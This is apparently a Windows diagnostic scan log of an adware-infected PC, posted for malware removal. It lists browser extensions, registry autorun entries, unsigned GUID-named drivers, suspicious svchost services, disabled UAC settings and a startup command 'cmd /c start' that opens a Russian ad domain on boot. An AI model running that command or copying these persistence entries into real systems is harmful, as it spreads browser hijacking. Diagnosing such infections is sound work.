Extension fdjdjkkjoiomafnihnobkinnfjnnlhdg 0 Советник Яндекс.Маркета 3.1.3.91
Extension fmgncofpadimjlpmndcpcfiilplihmop 1  
Extension geklbcigmpeljogplgbgnakkbajkkmbb 1  
Extension gfdkimpbcpahaombhbimeihdjnejgicl 1 Feedback 1.0
Extension ginepjojjbmfbfiibfdebddmbkjmgfle 1  
Extension gndaciceccgapjhpniecknjlmmlanaem 0 Визуальные Закладки Mail.Ru 2.0.1
Extension hgnpdbanhfmmdgeogllhocdajiphlkgi 1  
Extension ibgbdgngjflpkahkoabmiijlaggkinaj 1  
Extension iflppbjnpneiigcbdfjpnkebidmkjmoi 1 Визуальные Закладки Mail.Ru 5.0.1
Extension kmendfapggjehodndflmmgagdbamhnfd 1 CryptoTokenExtension 0.9.22
Extension lanabbpahpjnaljebnpgkjemcbkepiak 0 Поиск Mail.Ru 2.0.2
Extension lbjjfiihgfegniolckphpnfaokdkbmdm 1 Домашняя страница Mail.Ru 7.0.1
Extension lccekmodgklaepjeofjdjpbminllajkg 1 Chrome Hotword Shared Module 0.3.0.5
Extension lifbcibllhkdhoafpjfnlhfpfgnpldfl 0 Skype 8.0.0.9098
Extension lojpenhmoajbiciapkjkiekmobleogjc 1 Default Placeholder Extensions 35.2.1
Extension maogheekjnedndkikdmhdbacchlinogh 1 Media Saver 361.0.3.70
Extension mfehgcgbbipciphmccgaenjidiccnmng 1 Cloud Print 0.1
Extension mgndgikekgjfcpckkfioiadnlibdjbkf 1 Chrome 0.1
Extension mhjfbmdgcfjbbpaeojofohoefgiehjai 1 Chrome PDF Viewer 1
Extension mmebmmnpohfhoknnlpohjaembcipocaa 1  
Extension nbpagnldghgfoolbancepceaanlmhfmd 1 Hotword triggering 0.0.1.4
Extension neajdppkdcdipfabeoofebfddakdcjhd 1 Google Network Speech 1.0
Extension necfmkplpminfjagblfabggomdpaakan 0 Поиск  Яндексa 1.2.6.3
Extension nkeimhogjdpnpccoofpliimaahmaaome 1 Google+ Hangouts 1.0
Extension nmbfljkmcghmakofbhhgemjhboabdkcn 1  
Extension nmmhkkegccagdldgiimedpiccmgmieda 1 Платежная система Интернет-магазина Chrome 0.1.2.0
Extension oglbnjemojcfoedkaaonhbgcdmflhipf 1 Поиск по торрентам 361.0.0.65
Extension pafkbggdmjlpgkdkcbjmhmfcdpncadgh 1 Google Now 1.2.0.1
Extension pfigaoamnncijbgomifamkmkidnnlikl 0 Поиск и стартовая  – Яндекс 1.2.6.1
Extension pjkljhegncpnkpknbcohdijeoejaedia 1 Gmail 8.1
Extension ppoilmfkbpckodoifdlkmkepcajfjmhl 1 Домашняя страница Mail.Ru 7.0.1
Homepage: http://mail.ru/cnt/10445?gp=820031
default_search_provider.search_url: 
C:\Users\Владислав\AppData\Local\Google\Chrome\User Data\Default\Preferences
Homepage: 
default_search_provider.search_url: 

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\bgcifljfapbhgiehkjlckfjmgeojijcb]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\bgknpfancpeamejmcooedljjnaddldhg]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\dkekdlkmdpipihonapoleopfekmapadh]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\eioddfaepdoeifbhjphfefgipcjcdieo]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fdjdjkkjoiomafnihnobkinnfjnnlhdg]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gndaciceccgapjhpniecknjlmmlanaem]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\iflppbjnpneiigcbdfjpnkebidmkjmoi]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lanabbpahpjnaljebnpgkjemcbkepiak]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lbjjfiihgfegniolckphpnfaokdkbmdm]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl]
"Path"=C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\necfmkplpminfjagblfabggomdpaakan]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\pfigaoamnncijbgomifamkmkidnnlikl]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\ppoilmfkbpckodoifdlkmkepcajfjmhl]
"Path"=


======Registry dump======


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL"=http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC


[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL"=http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{12E8A6C2-B125-479F-AB3C-13B8757C7F04}]
MSaver

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}]
Skype Click to Call for Internet Explorer - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08 2134656]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{12E8A6C2-B125-479F-AB3C-13B8757C7F04}]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}]
Skype Click to Call for Internet Explorer - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08 1725056]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Skype"=C:\Program Files (x86)\Skype\Phone\Skype.exe [2015-08-07 53722224]
"GenieFloater"=C:\Program Files (x86)\Genie Soft\Genie Cleaner\GenieFloater.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\baidusdTray]
C:\Program Files (x86)\BaiduSd3.0\BaiduSd\3.0.0.4605\baidusdTray.exe  -stmd=3 []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BlueStacks Agent]
C:\Program Files (x86)\BlueStacks\HD-Agent.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Browser Manager]
C:\Users\Владислав\AppData\Local\Yandex\BrowserManager\BrowserManager.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Daemon]
C:\Users\Владислав\AppData\Roaming\daemon2.exe [2016-01-18 170672]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GameXP AccessPoint]
C:\GameXP\AccessPoint\accesspoint.exe -silent []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GenieFloater]
C:\Program Files (x86)\Genie Soft\Genie Cleaner\GenieFloater.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GetGoDM]
C:\Program Files (x86)\GetGo Software\GetGo Download Manager\GetGo.exe /minimized: []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Google Update]
C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /c []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GoogleChromeAutoLaunch_203FD1B6B4F492A0A8A984C446590D7B]
C:\Program Files (x86)\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --no-startup-window []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KometaAutoLaunch_A038D26498222E3AF0B26AC6E0272F6A]
C:\Users\Владислав\AppData\Local\Kometa\Application\kometa.exe --no-startup-window []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Muzbaza]
C:\Program Files (x86)\Muzabaza\Muzabaza player\Muzabaza.exe [2013-11-12 1876480]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched]
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2014-03-18 224128]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Search]
C:\Program Files (x86)\Pay-By-Ads\Yahoo! Search\1.3.26.12\dsrlte.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\YandexElements]
C:\Users\Владислав\AppData\Local\Yandex\Elements\elements.exe\8.7.0.3110\elements64.exe /auto []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ZetaGamesNews]
C:\Users\Владислав\AppData\Local\ZetaGamesNews\zeta.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ZetaGamesViewer]
C:\Users\Владислав\AppData\Local\ZetaGamesViewer\zetaviewer.exe --show-hidden []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\zgtqkznlfp]
cmd /c start http://nilavets.ru/?utm_source=uoua03&utm_content=269102ffd6df900960deb96339e07c3b []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Zona]
C:\Program Files (x86)\Zona\Zona.exe /MINIMIZED []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^WebBrowserMixVideoPlayer.lnk]
C:\PROGRA~2\MIXVID~1\BROWSE~1.EXE [2015-03-17 169984]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^Владислав^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^crossbrowse.lnk]
C:\PROGRA~2\CROSSB~1\CROSSB~1\APPLIC~1\CROSSB~1.EXE  []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^Владислав^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Desktop Mania.lnk]
  []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^Владислав^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MyPC Backup.lnk]
C:\PROGRA~2\MYPCBA~1\MYPCBA~1.EXE  []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^Владислав^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^superoptimizersetup.lnk]
C:\PROGRA~3\{2BBB4~1\SUPERO~1.EXE /startup []

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"gmsd_ru_116"= []

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=" "

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\OptimizerMonitor]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=0
"ConsentPromptBehaviorUser"=3
"EnableLUA"=0
"EnableUIADesktopToggle"=0
"PromptOnSecureDesktop"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=145

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoActiveDesktop"=1
"NoActiveDesktopChanges"=1
"ForceActiveDesktopOn"=0

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"VIDC.UYVY"=msyuv.dll
"VIDC.YUY2"=msyuv.dll
"VIDC.YVYU"=msyuv.dll
"VIDC.IYUV"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"VIDC.YVU9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
"wave2"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer2"=wdmaud.drv
"aux2"=wdmaud.drv
"MSVideo8"=VfWWDM32.dll

======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*

======List of files and folders created in the last 3 months======

2016-04-14 11:26:11 ----D---- C:\AdwCleaner
2016-03-25 14:02:52 ----D---- C:\Windows\SYSWOW64\.launcher_log
2016-03-07 15:11:05 ----ASH---- C:\pagefile.sys
2016-02-24 17:24:16 ----D---- C:\Program Files (x86)\Genie Soft
2016-02-08 15:28:09 ----D---- C:\ProgramData\BlueStacksSetup
2016-01-20 16:02:12 ----D---- C:\Users\Владислав\AppData\Roaming\GetGo Software
2016-01-19 14:49:08 ----D---- C:\Users\Владислав\AppData\Roaming\CentralPicture
2016-01-19 14:48:46 ----D---- C:\Users\Владислав\AppData\Roaming\Calculator
2016-01-19 14:45:39 ----D---- C:\Program Files (x86)\GetGo Software
2016-01-19 14:36:38 ----D---- C:\Users\Владислав\AppData\Roaming\WindowsUpdater
2016-01-18 20:33:56 ----A---- C:\Users\Владислав\AppData\Roaming\daemon2.exe

======List of files and folders modified in the last 3 months======

2016-04-14 11:36:09 ----D---- C:\Program Files (x86)\Opera
2016-04-14 11:31:46 ----D---- C:\Users\Владислав\AppData\Roaming\Skype
2016-04-14 11:31:40 ----D---- C:\Windows\Temp
2016-04-14 11:29:19 ----D---- C:\Windows\system32\Tasks
2016-04-14 11:29:18 ----D---- C:\Windows\Tasks
2016-04-14 11:29:07 ----D---- C:\Windows\SYSWOW64\drivers
2016-04-14 11:29:07 ----D---- C:\Windows\SysWOW64
2016-04-14 11:29:07 ----D---- C:\Windows\system32\drivers
2016-04-14 11:29:07 ----D---- C:\Windows\System32
2016-04-14 11:28:28 ----AHD---- C:\ProgramData
2016-04-14 11:28:27 ----RD---- C:\Program Files (x86)
2016-04-14 11:28:17 ----RD---- C:\Program Files
2016-04-14 10:54:33 ----D---- C:\Windows\Microsoft.NET
2016-04-14 10:48:09 ----SHD---- C:\Config.Msi
2016-04-14 10:47:12 ----SD---- C:\Users\Владислав\AppData\Roaming\Microsoft
2016-04-14 10:46:47 ----D---- C:\Program Files (x86)\Twilight Tech
2016-04-14 10:40:53 ----SHD---- C:\Windows\Installer
2016-04-14 10:40:52 ----RSD---- C:\Windows\assembly
2016-04-14 10:38:25 ----SHD---- C:\System Volume Information
2016-04-14 10:37:32 ----D---- C:\Program Files (x86)\Download Master
2016-04-14 10:36:15 ----D---- C:\Windows\system32\appmgmt
2016-04-14 10:35:29 ----D---- C:\ProgramData\Kaspersky Lab
2016-04-14 10:35:23 ----D---- C:\Windows\system32\DriverStore
2016-04-14 10:35:23 ----D---- C:\Windows\system32\catroot
2016-04-14 10:35:23 ----D---- C:\Windows\inf
2016-04-14 10:35:06 ----D---- C:\Program Files\Common Files\AV
2016-04-14 10:32:47 ----D---- C:\Users\Владислав\AppData\Roaming\Yandex
2016-04-14 10:23:51 ----D---- C:\Windows\system32\catroot2
2016-04-14 10:22:37 ----D---- C:\Windows\pss
2016-04-14 09:01:44 ----D---- C:\Windows\Prefetch
2016-04-10 18:36:37 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe
2016-04-10 15:05:30 ----D---- C:\Windows\system32\config
2016-03-14 20:41:17 ----D---- C:\Windows
2016-03-14 16:49:56 ----D---- C:\Windows\Minidump
2016-03-14 16:47:58 ----D---- C:\Windows\Logs
2016-03-13 21:05:30 ----A---- C:\Windows\system32\PerfStringBackup.INI
2016-01-18 18:28:53 ----RD---- C:\Program Files (x86)\Skype

File C:\Windows\system32\winlogon.exe is digitally signed
File C:\Windows\system32\wininit.exe is digitally signed
File C:\Windows\explorer.exe is digitally signed
File C:\Windows\SysWOW64\explorer.exe is digitally signed
File C:\Windows\system32\svchost.exe is digitally signed
File C:\Windows\SysWOW64\svchost.exe is digitally signed
File C:\Windows\system32\services.exe is digitally signed
File C:\Windows\system32\User32.dll is digitally signed
File C:\Windows\SysWOW64\User32.dll is digitally signed
File C:\Windows\system32\userinit.exe is digitally signed
File C:\Windows\SysWOW64\userinit.exe is digitally signed
File C:\Windows\system32\rpcss.dll is digitally signed
File C:\Windows\system32\Drivers\volsnap.sys is digitally signed

======List of drivers (start type: R=Running, S=Stopped, 0=Boot, 1=System, 2=Automatic, 3=Manual, 4=Disabled)======

R0 iusb3hcs;Драйвер хост-контроллера и коммутатора Intel(R) USB 3.0; C:\Windows\system32\DRIVERS\iusb3hcs.sys [2013-07-18 20464]
R0 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2010-11-21 213888]
R1 {09c3ffd6-f1a3-4fde-86e1-d448e8559c21}w64;{09c3ffd6-f1a3-4fde-86e1-d448e8559c21}w64; C:\Windows\system32\drivers\{09c3ffd6-f1a3-4fde-86e1-d448e8559c21}w64.sys [2015-03-10 48832]
R1 {1a7531da-31ad-48c5-8d60-be70ecfbab93}w64;{1a7531da-31ad-48c5-8d60-be70ecfbab93}w64; C:\Windows\system32\drivers\{1a7531da-31ad-48c5-8d60-be70ecfbab93}w64.sys [2015-02-24 48832]
R1 {34789ec0-129d-4a2d-b089-9977cdae65db}w64;{34789ec0-129d-4a2d-b089-9977cdae65db}w64; C:\Windows\system32\drivers\{34789ec0-129d-4a2d-b089-9977cdae65db}w64.sys [2015-02-12 48832]
R1 {3560b757-0519-45b3-a215-cfb94afd0821}Gw64;{3560b757-0519-45b3-a215-cfb94afd0821}Gw64; C:\Windows\system32\drivers\{3560b757-0519-45b3-a215-cfb94afd0821}Gw64.sys [2015-02-05 48832]
R1 {4bcd2e21-b225-4bad-81f4-2c4a7013cd87}w64;{4bcd2e21-b225-4bad-81f4-2c4a7013cd87}w64; C:\Windows\system32\drivers\{4bcd2e21-b225-4bad-81f4-2c4a7013cd87}w64.sys [2015-03-04 48832]
R1 {955a1491-962c-4a4d-a25b-ddfc77991b58}w64;{955a1491-962c-4a4d-a25b-ddfc77991b58}w64; C:\Windows\system32\drivers\{955a1491-962c-4a4d-a25b-ddfc77991b58}w64.sys [2015-02-16 48832]
R1 {9d525140-2aa5-4c29-b571-058468248f69}w64;{9d525140-2aa5-4c29-b571-058468248f69}w64; C:\Windows\system32\drivers\{9d525140-2aa5-4c29-b571-058468248f69}w64.sys [2015-02-22 48832]
R1 {bab3007b-75f3-4020-8eee-4c923fdcb91b}w64;{bab3007b-75f3-4020-8eee-4c923fdcb91b}w64; C:\Windows\system32\drivers\{bab3007b-75f3-4020-8eee-4c923fdcb91b}w64.sys [2015-02-28 48832]
R1 {c0915853-fd66-4086-a9ce-b80496d49b3f}w64;{c0915853-fd66-4086-a9ce-b80496d49b3f}w64; C:\Windows\system32\drivers\{c0915853-fd66-4086-a9ce-b80496d49b3f}w64.sys [2015-02-07 48832]
R1 {d487b1e4-59cf-4940-87da-e7c5a283dab7}w64;{d487b1e4-59cf-4940-87da-e7c5a283dab7}w64; C:\Windows\system32\drivers\{d487b1e4-59cf-4940-87da-e7c5a283dab7}w64.sys [2015-03-06 48832]
R1 {e85a0e97-fa40-4dc4-a79e-e1c1cabe72eb}w64;{e85a0e97-fa40-4dc4-a79e-e1c1cabe72eb}w64; C:\Windows\system32\drivers\{e85a0e97-fa40-4dc4-a79e-e1c1cabe72eb}w64.sys [2015-02-18 48832]
R1 bd0001;bd0001; C:\Windows\system32\DRIVERS\bd0001.sys [2014-12-23 181072]
R1 bd0004;bd0004; C:\Windows\system32\DRIVERS\bd0004.sys [2014-12-23 168776]
R1 BDMWrench;BDMWrench; C:\Windows\system32\DRIVERS\BDMWrench.sys [2014-12-23 130888]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2010-11-21 514560]
R2 BDArKit;BDArKit; C:\Windows\system32\DRIVERS\BDArKit.sys [2014-12-26 152392]
R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2013-09-12 12760576]
R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2013-09-12 619008]
R3 L1C;NDIS Miniport Driver for Qualcomm Atheros AR81xx PCI-E Ethernet Controller; C:\Windows\system32\DRIVERS\L1C62x64.sys [2013-07-18 129224]
S1 bd0002;bd0002; C:\Windows\system32\DRIVERS\bd0002.sys []
S1 BDEnhanceBoost;BDEnhanceBoost; C:\Windows\system32\drivers\BDEnhanceBoost.sys []
S1 BDMWrench_x64;BDMWrench_x64; C:\Windows\system32\DRIVERS\BDMWrench_x64.sys []
S2 BDMNetMon;BDMNetMon; C:\Windows\system32\DRIVERS\BDMNetMon.sys []
S3 cpuz134;cpuz134; \??\C:\Users\4918~1\AppData\Local\Temp\cpuz134\cpuz134_x64.sys []
S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-21 71168]
S3 FairplayKD;FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys []
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2010-11-21 165888]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2010-11-21 20992]
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-21 6656]
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-21 34688]
S3 Synth3dVsc;Synth3dVsc; C:\Windows\System32\drivers\synth3dvsc.sys [2010-11-21 88960]
S3 terminpt;Microsoft Remote Desktop Input Driver; C:\Windows\system32\drivers\terminpt.sys [2010-11-21 34816]
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2010-11-21 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2010-11-21 31232]
S3 tsusbhub;@%SystemRoot%\system32\drivers\tsusbhub.sys,-1; C:\Windows\system32\drivers\tsusbhub.sys [2010-11-21 117248]
S3 usb_rndisx;Адаптер USB RNDIS; C:\Windows\system32\DRIVERS\usb8023x.sys [2013-02-12 19968]
S3 VGPU;VGPU; C:\Windows\System32\drivers\rdvgkmd.sys []
S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-21 199552]
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-21 21760]
S3 WinUsb;WinUsb; C:\Windows\system32\DRIVERS\WinUsb.sys [2010-11-21 41984]

======List of services (start type: R=Running, S=Stopped, 0=Boot, 1=System, 2=Automatic, 3=Manual, 4=Disabled)======

R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2013-09-12 239616]
R2 BDSGRTP;BDSGRTP Service; C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BaiduProtect.exe [2014-12-23 1923688]
R2 c2cautoupdatesvc;Skype Click to Call Updater; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2016-01-08 1433216]
R2 c2cpnrsvc;Skype Click to Call PNR Service; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2016-01-08 1773696]
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; %SystemRoot%\System32\svchost.exe -k LocalSystemNetworkRestricted;"ServiceDll"=%SystemRoot%\System32\cscsvc.dll
R2 Local Policy Client;Local Policy Client; C:\Windows\SysWOW64\lpclient.exe [2013-08-02 308224]
R2 MDM;Machine Debug Manager; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE [2003-06-20 322120]
R2 MSLSService;MSLSService; C:\Program Files (x86)\Media Saver\Basement\MSLSService.exe [2015-01-13 76296]
R2 PnkBstrA;PnkBstrA; C:\Windows\syswow64\PnkBstrA.exe [2014-03-06 75136]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-03-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-03-18 138576]
S2 d3dadapter;3D Graphic adapter for video card; %SystemRoot%\System32\svchost.exe -k netsvcs;"ServiceDll"=%SystemRoot%\System32\d3dadapter.dll
S2 gupdate;Служба Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc []
S2 ihctrl32;Intel(R) Host Controller Interface (non-volatile memory); %SystemRoot%\System32\svchost.exe -k Intel(R);"ServiceDll"=%SystemRoot%\System32\ihctrl32.dll
S2 ir16_32;Intel Indeo(N) service; %SystemRoot%\System32\svchost.exe -k netsvcs;"ServiceDll"=%SystemRoot%\System32\ir16_32.dll
S2 SkypeUpdate;Skype Updater; C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-07-09 327296]
S2 wlanmgr;Wireless Manager; %SystemRoot%\System32\svchost.exe -k netsvcs;"ServiceDll"=
S2 wsaudio;Windows Audio 5.1 Surround; %SystemRoot%\System32\svchost.exe -k AudioDrv;"ServiceDll"=%SystemRoot%\System32\wsaudio.dll
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-04-10 269504]
S3 AppMgmt;@appmgmts.dll,-3250; %SystemRoot%\system32\svchost.exe -k netsvcs;"ServiceDll"=%SystemRoot%\System32\appmgmts.dll
S3 aspnet_state;ASP.NET State Service; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2010-03-18 44376]
S3 gupdatem;Служба Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc []
S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe [2013-11-26 111616]
S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; %SystemRoot%\System32\svchost.exe -k PeerDist;"ServiceDll"=%SystemRoot%\system32\peerdistsvc.dll
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; %SystemRoot%\System32\svchost.exe -k LocalSystemNetworkRestricted;"ServiceDll"=%SystemRoot%\System32\umrdp.dll
S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe [2014-01-02 1255736]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2010-03-18 124240]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2010-03-18 124240]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2010-03-18 124240]

